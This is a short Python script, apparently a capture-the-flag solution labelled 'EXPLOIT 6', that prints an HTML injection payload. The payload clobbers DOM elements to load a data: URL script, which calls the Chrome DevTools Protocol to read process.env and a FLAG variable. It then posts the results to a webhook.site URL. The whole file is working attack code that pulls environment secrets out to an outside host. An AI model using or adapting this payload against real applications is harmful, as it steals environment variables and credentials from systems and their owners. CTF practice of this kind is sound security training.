#!/usr/bin/env python3
"""
EXPLOIT 6: Use CDP to read process.env
The FLAG might be in environment variables rather than a file
"""

import urllib.parse
WEBHOOK = "https://webhook.site/YOUR-WEBHOOK-ID"  # Replace

code = f"""
(async () => {{
    try {{
        const Main = await import('/devtools/main/main.js');
        
        // Try to access process.env via CDP
        const result = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
            expression: 'process.env'
        }});
        
        await fetch('{WEBHOOK}', {{
            method: 'POST',
            body: JSON.stringify({{
                processEnv: result
            }}, null, 2)
        }});
        
        // Also specifically look for FLAG
        const flagResult = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
            expression: 'process.env.FLAG || process.env.flag || "not found"'
        }});
        
        await fetch('{WEBHOOK}?flag=' + encodeURIComponent(flagResult.result.value));
        
    }} catch(e) {{
        await fetch('{WEBHOOK}', {{
            method: 'POST',
            body: JSON.stringify({{
                error: e.toString(),
                stack: e.stack
            }})
        }});
    }}
}})();
""".replace('\n', ' ')

encoded = urllib.parse.quote(code)

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("=" * 80)
print("EXPLOIT 6: Use CDP to Read process.env")
print("=" * 80)
print("\nThe FLAG might be in environment variables!")
print("\nPAYLOAD:\n")
print(payload)
print("\n" + "=" * 80)